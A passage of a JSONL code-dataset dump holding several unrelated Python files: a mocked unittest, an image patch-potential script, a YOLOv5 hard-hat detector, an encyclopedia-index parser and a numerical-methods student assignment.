test_food_price_connection_error(self):\n # mock requests.get and make the result has status_code attr not 200\n # check that ConnectionError is raised when food_price method called\n with patch(\"hen_class.requests.get\") as mocked_request:\n mocked_request.return_value.status_code = 404\n with self.assertRaises(ConnectionError):\n self.hen_house.food_price()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"homework_completed/HW#4 Tests Practice/test_hen_class.py","file_name":"test_hen_class.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"569070102","text":"import collections\nimport numpy as np\nimport cv2 \nfrom functools import reduce\nfrom sklearn.feature_extraction.image import extract_patches_2d\nimport warnings\nwarnings.filterwarnings('ignore')\nimport math\nfrom math import sqrt\nimport json\nfrom ast import literal_eval\n\n#import NeighboursFile\n#import Adaptive_parition\n\n############## Pre-processing #################\noriginal_img='U.jpeg'\nexample_img='v.png'\n#example_img='V.jpeg'\n\no_img = cv2.imread(original_img)\nclone_u = o_img.copy()\ne_img =\tcv2.imread(example_img)\nimg_yuv_U = cv2.cvtColor(o_img, cv2.COLOR_BGR2YUV)\nimg_yuv_V = cv2.cvtColor(e_img, cv2.COLOR_BGR2YUV)\n\ny, u, v = cv2.split(img_yuv_U)\ny2, u2, v2 = cv2.split(img_yuv_V)\n\ndum_V = y2\ndum_U= y \n\nimage_matrix=y\nstyle_matrix=y2\n\n# CHANGED : image size may not be square, hence separate out of bounds check\nimg_size_rows=y.shape[0]\nimg_size_columns=y.shape[1]\n\n# CHANGED : style size may not be square, hence separate out of bounds check\nstyle_size_rows=y.shape[0]\nstyle_size_columns=y.shape[1]\n\n\n\n#labels=Adaptive_parition.lb\n\ndl = json.load(open(\"labels.txt\"))\n#labels=list(itertools.chain(*dl.values()))\nlabels=dl\n\ndn=json.load(open('Neighbours_dict_text.txt'))\nneighbour_dict=dn\n#neighbour_dict=NeighboursFile.Neighbours_dict\nprint(\"label_dict: \",len(labels))\nprint(\"neighbour_dict\",len(neighbour_dict))\nprint(\"\\n\")\n\n#################### Main snippet Program ########################\n\n# global labels={region:[10 labels]}, neighbour_dict={region1:[neighbour1, ... ], region2 : ...., ... }), \n# binaries={ {[patch1, patch2] : {[label1, label2] : norm, .. }, ... 
} }\n\nimport numpy as np\nimport cv2\n#global labels, neighbour_dict, img_size, image_matrix, style_matrix\n\n\ndef l2_norm_unary (patch1, patch2) :\n\tpatch1=literal_eval(patch1)\n\tpatch_matrix1=np.split(image_matrix,[patch1[0][0],patch1[1][0]],axis=0)[1] ##X-axis\n\tpatch_matrix1=np.split(patch_matrix1,[patch1[0][1],patch1[1][1]],axis=1)[1] ##Y-axis\n\tpatch_matrix2=np.split(style_matrix,[patch2[0][0],patch2[1][0]],axis=0)[1] ##X-axis\n\tpatch_matrix2=np.split(patch_matrix2,[patch2[0][1],patch2[1][1]],axis=1)[1] ##Y-axis\n\tnorm_val = np.sum((patch_matrix1-patch_matrix2)**2)/(patch_matrix1.shape[0]**2)\n\t#print('norm_val : ',norm_val)\n\treturn norm_val\n\ndef l2_norm_binary (patch1, patch2) :\n\tprint('l2_norm_binary ....\\n')\n\tprint('image shape: ', image_matrix.shape,' style shape: ', style_matrix.shape)\n\tprint('patch1, patch2 : ',patch1,patch2)\n\tprint(\"\\n\")\n\t# CHANGED : image_matrix to style_matrix\n\tpatch_matrix1=np.split(style_matrix,[patch1[0][0],patch1[1][0]],axis=0)[1] ##X-axis\n\tpatch_matrix1=np.split(patch_matrix1,[patch1[0][1],patch1[1][1]],axis=1)[1] ##Y-axis\n\n\tpatch_matrix2=np.split(style_matrix,[patch2[0][0],patch2[1][0]],axis=0)[1] ##X-axis\n\tpatch_matrix2=np.split(patch_matrix2,[patch2[0][1],patch2[1][1]],axis=1)[1] ##Y-axis\n\tprint('patch_matrix1 - patch_matrix2 Shapes : ',patch_matrix1.shape, patch_matrix2.shape)\n\tprint(\"\\n\\n\")\n\tnorm_val = np.sum((patch_matrix1-patch_matrix2)**2)/(patch_matrix1.shape[0]**2)\n\treturn norm_val\n \n\ndef extended_label(label, extension) :\n\tlabel = np.asarray(label)\n\textension = np.asarray(extension)\n\n\t# CHANGED : extension to be done only wrt vertex1 of label; Out of bounds check added\n\tshaded = extension+label[0]\n\tif shaded[1][0]>style_size_rows-1 or shaded[1][1]>style_size_columns-1 :\n\t\treturn None\n\tif shaded[0][0]<0 or shaded[0][1]<0 :\n\t\treturn None\n\t\n\treturn list(shaded)\n\n\ndef binary_pots(reg1, reg2, extension1, extension2):\n\tprint('binary_pots ....\\n')\n\tdict_label_potentials = {}\n\tfor label1 in labels[str(reg1)] :\n\t\tfor label2 in labels[str(reg2)] :\n\t\t\tpatch1 = extended_label(label1, extension1)\n\t\t\tpatch2 = extended_label(label2, extension2)\n\t\t\tprint(\"patch1, patch2 : \",patch1, patch2)\n\t\t\tif patch1 is None or patch2 is None :\n\t\t\t\tdict_label_potentials[str([label1,label2])] = None\n\t\t\telse :\n\t\t\t\tdict_label_potentials[str([label1,label2])] = l2_norm_binary(patch1, patch2)\n\t\t\tprint(\"---------------------------\\n\")\n\treturn dict_label_potentials\n\n\ndef calculate_unaries(labels_dict):\n\t# store as dict(), dict1 = {region[i]:{label[j]: unary, ...}}\n\tunaries = {}\n\tfor partition in labels_dict :\n\t\tfor label in labels_dict[partition] :\n\t\t\tif partition not in unaries :\n\t\t\t\tunaries[partition] = {}\n\t\t\tunaries[partition][str(label)]= l2_norm_unary(partition, label)\n\treturn unaries\n\ndef extend_region(patch):\n\t# check for out of bounds\n\tver1, ver3 = patch\n\tTi = ver3[0]-ver1[0]\n\tTi_2 = int(Ti/2)\n\n\t# Check if index is less than side-1 (subtract as index starts at 0), set to 0.\n\tif ver1[0]-Ti_2 < 0 :\n\t extended_x1 = 0\n\telse :\n\t extended_x1 = ver1[0]-(Ti_2)\n\n\tif ver1[1]-Ti_2 < 0 :\n\t extended_y1 = 0\n\telse :\n\t extended_y1 = ver1[1]-(Ti_2)\n\n\tif ver3[0]+Ti_2 > img_size_rows-1 :\n\t extended_x2 = img_size_rows-1\n\telse :\n\t extended_x2 = ver3[0]+(Ti_2)\n\n\tif ver3[1]+Ti_2 > img_size_columns-1 :\n\t extended_y2 = img_size_columns-1\n\telse :\n\t extended_y2 = ver3[1]+(Ti_2)\n\n\treturn [extended_x1,extended_y1],[extended_x2,extended_y2]\n\ndef find_intersection_region(reg1, reg2) :\n\t# Which corner is inside the other square. 
Do for both.\n\t# One region's x & y coordinates which lie within the other regions xs and ys.\n\t#final_x1,final_x2,final_y1,final_y2\n\treg1_ver1, reg1_ver2 = reg1\n\treg1_x1, reg1_x2 = reg1_ver1[0],reg1_ver2[0]\n\treg1_y1, reg1_y2 = reg1_ver1[1],reg1_ver2[1]\n\treg2_ver1, reg2_ver2 = reg2\n\treg2_x1, reg2_x2 = reg2_ver1[0],reg2_ver2[0]\n\treg2_y1, reg2_y2 = reg2_ver1[1],reg2_ver2[1]\n\t# check if reg1 in reg2\n\tif reg1_x1 in range(reg2_x1, reg2_x2+1) :\n\t\tfinal_x1 = reg1_x1 \n\tif reg1_x2 in range(reg2_x1, reg2_x2+1) :\n\t\tfinal_x2 = reg1_x2\n\tif reg1_y1 in range(reg2_y1, reg2_y2+1) :\n\t\tfinal_y1 = reg1_y1 \n\tif reg1_y2 in range(reg2_y1, reg2_y2+1) :\n\t\tfinal_y2 = reg1_y2\n\t# check if reg2 in reg1 \n\tif reg2_x1 in range(reg1_x1, reg1_x2+1) :\n\t\tfinal_x1 = reg2_x1 \n\tif reg2_x2 in range(reg1_x1, reg1_x2+1) :\n\t\tfinal_x2 = reg2_x2 \n\tif reg2_y1 in range(reg1_y1, reg1_y2+1) :\n\t\tfinal_y1 = reg2_y1 \n\tif reg2_y2 in range(reg1_y1, reg1_y2+1) :\n\t\tfinal_y2 = reg2_y2\n\tprint('find_intersection_region Final Matrix : ',[final_x1,final_y1],[final_x2,final_y2])\n\treturn [final_x1,final_y1],[final_x2,final_y2]\n\ndef transform_wrt_origin(points, origin):\n\torigin = np.asarray(origin)\n\tpoints = np.asarray(points)\n\ttransformed_points=(list(points - origin))\n\n\treturn transformed_points\n\ndef calculate_binaries():\n\t#for each pair findIntersection\n\tbinaries = {}\n\tfor region in neighbour_dict :\n\t\treg1 = literal_eval(region)\n\t\tprint('reg1',reg1)\n\t\textended_reg1 = extend_region(reg1)\n\t\tprint('extended_reg1 : ',extended_reg1)\n\t\torigin1 = reg1[0]\n\t\tfor neighbour in neighbour_dict[region] :\n\t\t\treg2 = neighbour\n\t\t\tprint(\"reg2: \",reg2)\n\t\t\torigin2 = reg2[0]\n\t\t\t#extend region & neighbour. Handle edge cases\n\t\t\textended_reg2 = extend_region(reg2)\n\t\t\tprint('extended_reg2 : ',extended_reg2)\n\t\t\tprint(\"\\n\\n\")\n\t\t\tintersection = find_intersection_region(extended_reg1, extended_reg2)\n\t\t\ttransformed_intersection_o1 = transform_wrt_origin(intersection, origin1)\n\t\t\ttransformed_intersection_o2 = transform_wrt_origin(intersection, origin2)\n\t\t\t# dict2 = {[reg1,reg2] : {[label1x, label2y] : pair_pot, ... } ... }\n\t\t\tprint('transformed_intersection_o1 : ',transformed_intersection_o1)\n\t\t\tprint('transformed_intersection_o2 : ',transformed_intersection_o2)\n\t\t\tprint(\"\\n\")\n\t\t\tbinaries[str([reg1,reg2])]= binary_pots(reg1, reg2, transformed_intersection_o1, transformed_intersection_o2)\n\treturn binaries\n\n\n#### Calling Function:\nunary_dict = calculate_unaries(labels)\nprint(\"Unary Potentials completed...\")\nprint(\"\\n########################################\\n\")\n# CHANGED : IMPORTANT NOTE - Certain label pairs of regions may be NONE because of out of bounds issue. 
Disregard them.\nbinary_dict = calculate_binaries()\nprint(\"\\n########################################\\n\")\n","sub_path":"Split_and_Match/potentials_Modified_new.py","file_name":"potentials_Modified_new.py","file_ext":"py","file_size_in_byte":7828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"589407057","text":"import argparse\nimport os\nimport platform\nimport shutil\nimport time\nfrom pathlib import Path\n\nimport cv2\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom numpy import random\n\nfrom core.models.experimental import attempt_load\nfrom core.utils.datasets import LoadStreams, LoadImages\nfrom core.utils.general import non_max_suppression, scale_coords, xyxy2xywh, plot_one_box, letterbox\nfrom core.utils.torch_utils import select_device, time_synchronized\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Hardhat_detection_yolov5():\n def __init__(self, view, draw):\n if torch.cuda.is_available():\n device_type = 'cuda:0'\n else:\n device_type = 'cpu'\n\n print('Using device:', device_type)\n self.device = select_device(device_type)\n self.view = view\n self.draw = draw\n\n # Load self.model\n weights = '../../models/best.pt'\n self.model = attempt_load(weights, map_location=self.device) # load FP32 self.model\n \n # Get self.names and self.colors\n self.names = self.model.module.names if hasattr(self.model, 'module') else self.model.names\n\n # Set constant variables\n self.imgsz = 640\n\n self.conf_thres = 0.4\n self.iou_thres = 0.5\n self.classes = None\n self.agnostic_nms = True\n self.colors = [[0,0,255], [255,255,255], [255, 255, 0], [255,0,0], [210,105,30]]\n # names: ['blue', 'white', 'yellow', 'red', 'none']\n\n\n def predict(self, img_ori):\n # Run inference\n \n img = letterbox(img_ori, new_shape=self.imgsz)[0]\n \n # Convert\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n # img = img.transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n img = np.ascontiguousarray(img)\n \n img = torch.from_numpy(img).to(self.device)\n img = img / 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n \n # Inference\n t1 = time_synchronized()\n with torch.no_grad():\n pred = self.model(img, augment=True)[0]\n\n t2 = time_synchronized()\n print(f'Model inference FPS: {1 / (t2 - t1)}')\n \n # Apply NMS\n pred = non_max_suppression(pred, self.conf_thres, self.iou_thres, classes=self.classes, agnostic=self.agnostic_nms)\n\n bboxes_xyx2y2 = []\n labels = []\n # Process detections\n for i, det in enumerate(pred): # detections per image\n # gn = torch.tensor(img_ori.shape)[[1, 0, 1, 0]] # normalization gain whwh\n if det is not None and len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], img_ori.shape).round()\n \n # Write results\n for *xyxy, conf, cls in reversed(det):\n # xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh\n bboxes_xyx2y2.append([int(coord) for coord in xyxy])\n labels.append(self.names[int(cls)])\n\n if self.draw: # Add bbox to image\n label = '%s %.2f' % (self.names[int(cls)], conf)\n plot_one_box(xyxy, img_ori, label=label, color=self.colors[int(cls)], line_thickness=3)\n\n # Stream results\n if self.view:\n plt.figure(figsize=(15, 15))\n plt.imshow(img_ori[:, :, [2, 1, 0]])\n plt.show()\n\n return bboxes_xyx2y2, labels, img_ori\n\n return bboxes_xyx2y2, labels, img_ori\n\n\n# hardhat_detector = Hardhat_detection_yolov5()\n#\n# source_img_path = 
'../data/00000.jpg'\n# img_ori = cv2.imread(source_img_path)\n# with torch.no_grad():\n# t1 = time_synchronized()\n# det, gn = hardhat_detector.predict(img_ori)\n# t2 = time_synchronized()\n# print(f'FPS: {round((t2 - t1), 3)}')\n#\n","sub_path":"src/core/HardHat_detection_yolov5.py","file_name":"HardHat_detection_yolov5.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"597436229","text":"#coding:utf-8\n\nimport sys\nimport re\n\nopenbrack=r'[〔]'\nclosebrack=r'[〕]'\n\ndef isCloseOnly(line): # true if only a closing bracket appears on the line\n if re.search(openbrack,line)==None and re.search(closebrack,line):\n return True\n return False\n\ndef isDigitRow(line): # true if the line contains only index page numbers\n if line.isdigit():\n return True\n tmps=re.split(r'[,,]',line)\n for tmp in tmps:\n tmp=re.sub(\" \",\"\",tmp)\n if not tmp.isdigit():\n return False\n return True\n\ndef isInfoRow(line): # true if the line is a page header, index header, or blank line\n if line==\"\\n\" or line.startswith(\"-\") or line.startswith(\"【\") or line==\"\" or \"和英索引\" in line or \"英和索引\" in line:\n return True\n return False\n\ndef parse(filename):\n lines=[]\n with open(filename,\"r\")as f:\n tmpline=\"\"\n arc_brack_open_z=0 #(\n arc_brack_close_z=0 # )\n arc_brack_open_h=0 # (\n arc_brack_close_h=0 # )\n shell_brack_open=0 #〔\n shell_brack_close=0 # 〕\n for line in f.readlines():\n line=line.strip()\n if isInfoRow(line) or isDigitRow(line):\n continue\n arc_brack_open_z+=line.count(\"(\")\n arc_brack_close_z+=line.count(\")\")\n arc_brack_open_h+=line.count(\"(\")\n arc_brack_close_h+=line.count(\")\")\n shell_brack_open+=line.count(\"〔\")\n shell_brack_close+=line.count(\"〕\")\n\n if arc_brack_open_h==arc_brack_close_h and arc_brack_open_z==arc_brack_close_z and shell_brack_open==shell_brack_close:\n line=tmpline+line\n arc_brack_open_z=0\n arc_brack_close_z=0\n arc_brack_open_h=0\n arc_brack_close_h=0\n shell_brack_open=0\n shell_brack_close=0\n tmpline=\"\"\n #print(line)\n lines.append(line)\n else:\n tmpline+=line\n continue\n return lines\n \ndef remove_brack(lines):\n outlines=[]\n for line in lines:\n arc_z_pos=line.find(\"(\")\n arc_h_pos=line.find(\"(\")\n shell_pos=line.find(\"〔\")\n if arc_z_pos==-1:arc_z_pos=999\n if arc_h_pos==-1:arc_h_pos=999\n if shell_pos==-1:shell_pos=999\n \n pos=min(arc_z_pos,arc_h_pos,shell_pos)\n outlines.append(line[0:pos])\n return outlines\n \ndef remove_index(lines):\n outlines=[]\n for line in lines:\n spllines=line.split(\" \")\n for splline in spllines:\n if isDigitRow(splline):\n spllines.remove(splline)\n outlines.append(\"\".join(spllines))\n return outlines\n\nif __name__==\"__main__\":\n args=sys.argv\n lines=parse(args[1])\n lines=remove_brack(lines)\n lines=remove_index(lines)\n\n with open(\"worddic/AIdic.txt\",\"w\") as f:\n for line in lines:\n f.write(line+\"\\n\")\n","sub_path":"encycloindex2worddic.py","file_name":"encycloindex2worddic.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"203538804","text":"\"\"\"\n@author: christopher seay\n sid: s2286181\n email: seay@strw.leidenuniv.nl\n\n@course: numerical recipes in astrophysics\n@instructor: van daalen, m.p.\n\ncoding structure:\n labels are inside 'problem' function calls. 
for example, problem_1(case)\n has a comment that specifies its use is for problem 1a.\n procedural programming approach was used here.\n\nTODO: after writing the whole damn thing, don't forget to write to a pdf\n\"\"\"\n\nimport numpy as np\nimport sys\nfrom astropy.table import Table\nimport matplotlib\nmatplotlib.use(\"Agg\") # non-interactive\nimport matplotlib.pyplot as plt\n\ndef random_number_generator(seed):\n \"\"\"generate random number between [0,1).\n\n uses XOR 64 bit shift, mwc, and mlcg methods\n to generate a pseudorandom number. multiple\n methods are used to minimize correlation.\n\n args:\n seed: initial seed\n\n returns:\n I_j: random float [0,1)\n seed: 'new' seed to continue random number generation\n\n \"\"\"\n\n # random int constants to generate random numbers\n a1 = 21\n a2 = 35\n a3 = 4\n a4 = 182937572\n m = 2**64-1\n m2 = 2**32-1\n a = 9824192\n c = 1223536\n bit64 = 0xffffffffffffffff # 64-bit mask to limit memory use\n\n # initialize I_j with given seed\n # this seed is newly set after each call\n # start off with a bit of 64-bit XOR-shift\n I_j = seed ^ (seed >> a1) & bit64\n I_j = I_j ^ (I_j << a2)\n I_j = I_j ^ (I_j >> a3)\n\n # mclg\n I_j = (a*I_j + c) % m\n\n # mwc\n I_j = a4*(I_j & m2) + (I_j >> 32)\n\n # xor-shift again\n I_j = I_j ^ (I_j >> a1)\n I_j = I_j ^ (I_j << a2)\n I_j = I_j ^ (I_j >> a3)\n\n # mwc again\n I_j = a4*(I_j & m2) + (I_j >> 32)\n\n # finish with mlcg\n # divid by the period to get [0,1)\n I_j = (a*I_j + c) % m\n seed = I_j # set new \"seed\" for next iteration\n I_j = np.float64(I_j)/m # convert I_j from int to 64-bit float\n\n return I_j, seed\n\ndef calc_factorial(n):\n \"\"\"return n! (factorial of n).\n\n returns factorial of a real-valued integer n. for problem 1a.\n\n TODO: memory overflow error for large int values (e.g, 201).\n gamma function for non-integer real numbers.\n\n args:\n n: integer\n\n returns:\n n!\n\n \"\"\"\n\n if n < 0 or type(n) is float:\n raise ValueError('use only real-valued integers for k.')\n\n # for n usually not within memory limits\n if n > 101:\n result = np.log10(1)\n for i in range(2,n+1):\n result += np.log10(i)\n\n return np.float64(result)\n\n # for n within memory limits\n result = 1\n for i in range(2, n + 1):\n result *= i\n\n return np.float64(result)\n\ndef calc_derivative(function,x,step=1e-6):\n \"\"\"central difference method of differentiation.\n\n we compute the derivative numerically using the central difference method.\n step = 1e-6 seems to work very well after a bit of testing.\n if 1e-12 error is desirable, 1e-6 is achieved, which is sqrt(err).\n\n args:\n function: function to be differentiated\n x: maximum x-range; 5 for this assignment\n step: sufficiently small non-zero value to avoid machine error\n\n returns:\n derivative of function\n\n \"\"\"\n\n fn = function\n h = step\n dx = (fn(x+h)-fn(x-h))/(2*h)\n return dx\n\ndef romberg_integral(function,lower_bound,upper_bound,steps):\n \"\"\"romberg integration calculator.\n\n using the romberg integration algorithm (which uses the\n trapezoidal, extended trapezoidal, and richardson extrapolation)\n to calculate the integral of a function. creates a table of calculation\n guesses for the integrand, theoretically getting progressively\n closer to the real result. 
unless the integrand is impressively complex,\n steps param should be between 2-6.\n\n args:\n function: function to be integrated\n lower_bound: lower-bound of integrand\n upper_bound: upper-bound of integrand\n steps: number of romberg splits\n\n returns:\n table[-1,-1]: integrated function value\n\n \"\"\"\n\n # shorthand the verbose function input\n fn = function\n a = lower_bound\n b = upper_bound\n\n table = np.zeros((steps, steps), dtype=np.float64)\n pow_4 = 4 ** np.arange(steps, dtype=np.float64) - 1\n\n # trapezoidal rule\n h = (b - a)\n table[0, 0] = h * (fn(a) + fn(b)) / 2\n\n for j in range(1, steps):\n h /= 2\n\n # extended trapezoidal rule\n table[j, 0] = table[j - 1, 0] / 2\n table[j, 0] += h * np.sum(\n fn(a + i * h) for i in range(1, 2 ** j + 1, 2)\n )\n\n # richardson extrapolation\n for k in range(1, j + 1):\n table[j, k] = table[j, k - 1] + \\\n (table[j, k - 1] - table[j - 1, k - 1]) / pow_4[k]\n\n return table[-1,-1]\n\ndef calc_integral(function,lower_bound,upper_bound,steps):\n \"\"\"midpoint integrator for improper integrals.\n\n unfortunately, my romberg integrator doesn't work because the integrand\n doesn't play nice at xmin = 0, so this integrator will do. i'm keeping it\n in the code, however.\n\n args:\n function: function to be integrated\n lower_bound: lower-bound of integrand\n upper_bound: upper-bound of integrand\n steps: number of romberg splits\n\n return:\n integrated value\n\n \"\"\"\n\n # shorthand the verbose function input\n fn = function\n a = lower_bound\n b = upper_bound\n h = float(b - a)/steps\n i = 0 # integrand\n\n for j in range(steps):\n i += fn((a+h/2.0)+j*h)\n i *= h # final area\n\n return i\n\n\ndef calc_roots(f,a,b,tol,root):\n \"\"\"find roots of a given function.\n\n uses bisection method to calculate roots of the given function.\n note: for this assignment, the bounds are actually x = [0,5) but\n bisection does not work if a value is exactly 0, so a << 1 instead.\n\n args:\n f: function to find root of\n a: lower bound of bracket\n b: upper bound of bracket\n tol: precision tolerance for root (e.g, 1e-8)\n\n returns:\n c: f(c) = 0\n \"\"\"\n\n # brackets\n xl = a\n xr = b\n while np.abs(xl-xr) >= tol:\n c = (xl+xr)/2 # midpoint of bracket\n prod = f(xl)*f(c)\n if prod > root:\n xl = c\n else:\n if prod < root:\n xr = c\n return c\n\ndef calc_quantile(sl,quant):\n \"\"\"calculate quantiles from a sorted list.\n\n extremely simple algorithm that requires list to be sorted. roughly\n calculates desired quantile\n\n \"\"\"\n if quant == 0 or quant > 99:\n raise ValueError('percentiles range from 1-99.')\n q = quant - 1 # counting starts at 0\n quantile = sl[q]\n return np.float64(quantile)\n\ndef calc_average_number_of_satallites_per_bin(bin_vals,bins,nhalos):\n \"\"\"calculate the average number of satellites in a histogram bin.\n\n\n Divide bin values by width of bins, then by number of haloes used to create it\n Gives average number of satallies per bin\n \"\"\"\n\n avgs = np.zeros(len(bin_vals))\n\n # need to count and inspect particular indices, so we use enumerate\n # divide each element bin by the total number of halos to get an avg\n # number of satellites per halo first, then take out of log-log space\n # by dividing by the bin width\n for i, sat in enumerate(bin_vals):\n avg = sat/nhalos\n norm_avg = avg/(bins[i + 1] - bins[i])\n avgs[i] = norm_avg\n return avgs\n\ndef poisson_dist(w,n):\n \"\"\"calculates poisson distribution given by: P_w(k) = [w^k * e^(-w)] / k!\n\n given a w, k outputs a poisson probability P_w(k). 
for problem 1a.\n\n args:\n w: expected value of discrete random variable k.\n k: 0, 1, 2,...\n\n returns:\n P_w: poisson probability value\n\n TODO: be able to output (101,200) overflow issue\n\n \"\"\"\n k = calc_factorial(n)\n P_w = ((w**n)*(np.exp(-w))/k)\n return np.float64(P_w)\n\ndef interp1d_spline(x,xp,fp):\n \"\"\"1D spline interplator.\n\n curve fitting using linear polynomials to construct data points within\n specified range of discrete known data points.\n\n chosen for 2b because my 1D linear interpolator wasn't working.\n\n TODO: used an online guide for this but it's still not working. using\n a python library instead (numpy.interp(x,xp,fp))\n \"\"\"\n\n size = len(xp)\n\n xpdiff = np.diff(xp)\n fpdiff = np.diff(fp)\n\n # allocate buffer matrices\n Li = np.zeros(size)\n Li_1 = np.zeros(size-1)\n z = np.zeros(size)\n\n # fill diagonals Li and Li-1 and solve [L][y] = [B]\n Li[0] = np.sqrt(2*xpdiff[0])\n Li_1[0] = 0.0\n B0 = 0.0 # natural boundary\n z[0] = B0 / Li[0]\n\n for i in range(1, size-1, 1):\n Li_1[i] = xpdiff[i-1] / Li[i-1]\n Li[i] = np.sqrt(2*(xpdiff[i-1]+xpdiff[i]) - Li_1[i-1] * Li_1[i-1])\n Bi = 6*(fpdiff[i]/xpdiff[i] - fpdiff[i-1]/xpdiff[i-1])\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\n\n i = size - 1\n Li_1[i-1] = xpdiff[-1] / Li[i-1]\n Li[i] = np.sqrt(2*xpdiff[-1] - Li_1[i-1] * Li_1[i-1])\n Bi = 0.0 # natural boundary\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\n\n # solve [L.T][x] = [y]\n i = size-1\n z[i] = z[i] / Li[i]\n for i in range(size-2, -1, -1):\n z[i] = (z[i] - Li_1[i-1]*z[i+1])/Li[i]\n\n # find index\n index = x.searchsorted(x)\n np.clip(index, 1, size-1, index)\n\n xi1, xi0 = xp[index],xp[index-1]\n yi1, yi0 = fp[index],fp[index-1]\n zi1, zi0 = z[index],z[index-1]\n hi1 = xi1 - xi0\n\n # calculate cubic\n f0 = zi0/(6*hi1)*(xi1-x)**3 + \\\n zi1/(6*hi1)*(x-xi0)**3 + \\\n (yi1/hi1 - zi1*hi1/6)*(x-xi0) + \\\n (yi0/hi1 - zi0*hi1/6)*(xi1-x)\n return f0\n\n# def linear_interp_3D():\n# \"\"\"linearly interpolate for a given 3D function.\n#\n# \"\"\"\n#\n# continue\n\n# quicksort\ndef partition(xs, start, end):\n follower = leader = start\n while leader < end:\n if xs[leader] <= xs[end]:\n xs[follower], xs[leader] = xs[leader], xs[follower]\n follower += 1\n leader += 1\n xs[follower], xs[end] = xs[end], xs[follower]\n return follower\n\ndef _quicksort(xs, start, end):\n if start >= end:\n return\n p = partition(xs, start, end)\n _quicksort(xs, start, p-1)\n _quicksort(xs, p+1, end)\n\ndef quicksort(xs):\n _quicksort(xs, 0, len(xs)-1)\n# end quicksort\n\ndef random_sampling(function,xmin,xmax,ymin,ymax,sample_size,seed):\n \"\"\"random sample distribution using rejection sampling.\n\n\n creates a random sampling distribution from desired function\n with set size. utilizes rejection sampling to find valid points.\n for this assignment, sample_x will serve as radii, with sample_y the\n output of n(r). this is essentially junk data, but this sampling\n algorithm may be used in the future.\n\n TODO: had a slice sampling procedure but couldn't figure out\n the inverse function. not sure if there is one. 
i couldn't tell\n from the horizontal line test using w-alpha\n\n args:\n function: function to be sampled from\n xmin: minimum in range of possible x-values\n xmax: maximum in range of possible x-values\n ymin: maximum in range of possible y-values\n ymax: maximum in range of possible y-values\n sample_size: desired number of sample points in distribution\n\n returns:\n sample_x:\n sample_y:\n\n \"\"\"\n # fn = function\n # fn_inv = inv_function # actual inverse goes here\n # samples = np.zeros(iter)\n # x = 0\n # for i in range(iter):\n # u = rand(0, fn(x))\n # x_lo, x_hi = fn_inv(u)\n # x = rand(x_lo, x_hi)\n # samples[i] = x\n\n # return samples\n\n rand = random_number_generator # function alias\n\n fn = function\n sample_x = np.zeros(sample_size)\n sample_y = np.zeros(sample_size)\n samples = 0 # initializes size of accepted sample points\n while samples < sample_size:\n x,seed = rand(seed)\n y,seed = rand(seed) # get next random number\n sx = (xmax-xmin)*x+xmin\n sy = (ymax-ymin)*y+ymin\n\n if sy <= fn(sx):\n sample_x[samples] = sx\n sample_y[samples] = sy\n samples += 1\n\n return sample_x, sample_y\n\ndef generate_satellite_profile(f,nsats,seed):\n \"\"\"rejection sampler to generate 3D positions (r,theta,phi) of satellites.\n\n generates a 3D profile for satellites using a rejection sampler for the\n radial component and a random number generator for the polar,\n azimuthal components (theta, phi respectively).\n\n args:\n f: function to be used\n nsats: number of satellite galaxies\n seed: random seed\n\n returns:\n r,t,p 3D position for satellite\n\n \"\"\"\n\n rand = random_number_generator # function alias\n\n # set x,y range for sampling\n xmin = 0\n ymin = 0\n xmax = 5\n ymax = 5\n\n # nsats different satellites\n # x_sats,y_sats = random_sampling(f,xmin,xmax,ymin,ymax,nsats,seed)\n r_sats = random_sampling(f,xmin,xmax,ymin,ymax,nsats,seed)[0]\n theta_sats = np.zeros(nsats)\n phi_sats = np.zeros(nsats)\n for i in range(nsats):\n t,seed = rand(seed)\n p,seed = rand(seed) # get next random number\n # multiply by pi, 2pi for polar, azimuthal angle\n theta_sats[i] = np.pi*t\n phi_sats[i] = 2*np.pi*p\n\n return r_sats, theta_sats, phi_sats\n\ndef generate_halo_profile(nsats,nhalos,f,seed):\n \"\"\"generate halo containing satellite galaxies with 3D positions.\n\n halo contains nsats number of satellites\n\n \"\"\"\n\n halos = []\n r = []\n t = []\n p = []\n # np.shape(r) = (nhalos,nsats)\n for i in range(nhalos):\n ra,th,ph = generate_satellite_profile(f,nsats,seed)\n halos.append([ra,th,ph])\n r.append(ra)\n\n # we want all satellites in one big list\n r = np.concatenate(r)\n\n return halos,r\n\ndef rand_thousand_plot(x,x_1):\n fig = plt.figure(figsize=(7,5))\n plt.scatter(x,x_1)\n plt.xlabel('$x_i$',fontsize=14)\n plt.ylabel('$x_{i+1}$',fontsize=14)\n plt.savefig('plt1.png',format='png')\n\ndef rand_million_plot(x_mil):\n fig = plt.figure(figsize=(7,5))\n b = np.linspace(0.0,1.0,20)\n plt.title('1 million random numbers distribution')\n plt.hist(x_mil,color='k',bins=b,histtype='step')\n plt.savefig('plt2.png',format='png')\n\ndef interp1d_plot(x_range,func_vals,interp):\n fig = plt.figure(figsize=(7,5))\n x = x_range\n y = func_vals\n plt.xlabel('$\\log$(x)',fontsize=14)\n plt.ylabel('$\\log$(n)',fontsize=14)\n plt.xscale('log') # log scale for x\n plt.yscale('log') # log scale for y\n plt.scatter(x,y,alpha=0.5,c='b',label='data')\n plt.plot(x,interp,c='k',label='interpolated values')\n plt.legend(frameon=False,loc='best')\n plt.savefig('plt3.png',format='png')\n\ndef 
